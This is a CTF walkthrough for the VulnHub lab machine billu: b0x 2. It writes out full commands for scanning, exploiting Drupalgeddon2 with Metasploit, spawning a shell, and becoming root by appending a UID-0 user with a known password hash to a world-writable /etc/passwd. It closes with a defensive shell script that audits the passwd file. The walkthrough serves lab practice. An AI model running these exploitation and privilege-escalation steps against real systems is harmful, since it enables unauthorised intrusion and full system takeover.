billu: b0x 2 Walkthrough


Hello Everyone, let's begin

ctf link : https://www.vulnhub.com/entry/billu-b0x-2,238/

download link : https://download.vulnhub.com/billu/billu-b0x2.7z

I opened it with VirtualBox in bridged mode on the interface named vmnet8 (172.16.59.0/24).

CTF level : Beginner

Vulnerabilities to exploit : Drupalgeddon 2 (Forms API Property Injection), world-writable /etc/passwd

Techniques and tools : Wappalyzer, Droopescan, Searchsploit, Metasploit, openssl

I found the IP using arp-scan
sudo arp-scan --interface vmnet8 --local

I found the IP of the CTF machine: 172.16.59.155

I started by scanning the 1000 well-known ports and banner grabbing using nmap
sudo nmap -sSV 172.16.59.155

I tried to fuzz ports 22 and 111 first, but these didn't give me fascinating results. Although OpenSSH is exploitable, I was looking for an easy entry, so I looked into the http service. When I opened http://172.16.59.155 in the browser, I saw Drupal.


I wanted the version of this Drupal install, so I used Droopescan
droopescan scan drupal -u http://172.16.59.155

It gave me Drupal version: 8.3.6

I used searchsploit to check if any exploit exists.
searchsploit drupal|grep 8

I saw Drupalgeddon2 RCE (Metasploit).

I opened msfconsole. I searched for drupalgeddon2.
msfconsole
msf5 > search drupalgeddon2

I found one exploit and used it
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 172.16.59.155
exploit
And this was easy af.



Now it's time for a shell and privilege escalation. I spawned a tty shell first.
meterpreter > shell
python -c 'import pty;pty.spawn("/bin/bash");'

When I checked the permissions of /etc/passwd, I found it had 777 permissions. That means I can add my own user.


I had to create a user entry in the /etc/passwd format. I'm using openssl to create the password hash
openssl passwd -1 -salt john password
Output : $1$john$xeOd1Br2.VH1SBVMwHrR10
Here I'm using MD5-based crypt (-1) to create the hash, salted with "john". The password is password. Now I have to insert a new entry into /etc/passwd.
echo 'john:$1$john$xeOd1Br2.VH1SBVMwHrR10:0:0:john:/root:/bin/bash'>>/etc/passwd

I checked the entry using
cat /etc/passwd|tail -n 2
It was a perfect entry. Now I just had to switch to john.
su john
Password: password
And I'm root now.
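As an added check (not part of the walkthrough), here is a small POSIX sh audit for the two conditions abused above: a passwd file that is group/other writable, and entries that are UID 0 but not root or that carry a hash in the passwd file instead of deferring to /etc/shadow. The sample passwd file it builds is constructed for the demo and reuses the john entry from this post; the function names are my own.

```shell
#!/bin/sh
# Audit helpers for a passwd file (added example, not from the walkthrough).

# Print "writable" if group or other has write permission on the file, else "ok".
# Reads the mode bits from ls so the answer does not depend on who runs it.
check_passwd_mode() {
    perms=$(ls -ld "$1" | cut -c1-10)   # e.g. -rwxrwxrwx
    case "$perms" in
        ?????w*|????????w?) echo writable ;;
        *) echo ok ;;
    esac
}

# Print one line per suspicious entry, as "<reason>:<username>".
# Flags: a UID-0 account that is not root, and a password field that holds a
# hash instead of 'x' (hash belongs in /etc/shadow) or a lock marker.
audit_passwd_entries() {
    while IFS=: read -r name pw uid gid gecos home shell; do
        [ -z "$name" ] && continue
        if [ "$uid" = "0" ] && [ "$name" != "root" ]; then
            echo "uid0:$name"
        fi
        case "$pw" in
            x|\*|!|!!|"") ;;
            *) echo "hash_in_passwd:$name" ;;
        esac
    done < "$1"
}

# Constructed sample passwd file (not a real system's): root, a service
# account, and the john entry from the walkthrough, with the box's 777 mode.
make_sample_passwd() {
    f=$(mktemp)
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'john:$1$john$xeOd1Br2.VH1SBVMwHrR10:0:0:john:/root:/bin/bash' > "$f"
    chmod 777 "$f"
    echo "$f"
}

# Usage: run both checks on the sample (point them at /etc/passwd on a real host).
sample=$(make_sample_passwd)
echo "mode: $(check_passwd_mode "$sample")"
audit_passwd_entries "$sample"
rm -f "$sample"
```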
